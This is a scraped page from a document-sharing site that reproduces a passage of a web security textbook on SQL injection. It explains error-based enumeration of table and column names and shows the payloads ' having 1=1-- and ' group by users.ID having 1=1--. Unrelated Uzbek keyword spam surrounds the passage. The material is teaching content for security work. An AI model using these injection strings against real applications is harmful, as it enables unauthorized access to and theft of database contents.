The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws



Download 5,76 Mb.
Pdf ko'rish
bet473/875
Sana01.01.2022
Hajmi5,76 Mb.
#293004
1   ...   469   470   471   472   473   474   475   476   ...   875
Bog'liq
3794 1008 4334

262

Chapter 9 



Injecting Code

70779c09.qxd:WileyRed  9/14/07  3:13 PM  Page 262


can be exploited in various ways. The techniques described here were first dis-

covered by David Litchfield and Chris Anley in the course of a penetration

test, and are described in detail in several whitepapers by them. 

Enumerating Table and Column Names

Recall the login function described earlier, which performs the following 

SQL query, in which the username and password fields are vulnerable to SQL

injection:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

Although you can bypass the login by injecting into either of these fields, if

you wish to exploit the vulnerability to extract or modify sensitive data, then

you will need to know the names of the table and columns involved. Suppose

that the table being queried was originally created using the command

create table users( ID int, username varchar(255), password

varchar(255), privs int)

If ODBC error messages are being returned to your browser, then you can

trivially obtain all of this information about the table. The first step is to inject

the following string into one of the vulnerable fields:

‘ having 1=1--

This generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘users.ID’ is 

invalid in the select list because it is not contained in an aggregate 

function and there is no GROUP BY clause.

Embedded in this error message is the item 

users.ID


, which in fact dis-

closes the name of the table being queried (

users

) and the name of the first col-



umn being returned by the query (

ID

). The next step is to insert the



enumerated column name into the attack string, which produces this:

‘ group by users.ID having 1=1--

Submitting this value generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘users.username’ 

is invalid in the select list because it is not contained in either an 

aggregate function or the GROUP BY clause.


Download 5,76 Mb.

Do'stlaringiz bilan baham:
1   ...   469   470   471   472   473   474   475   476   ...   875



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling
kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha

yuklab olish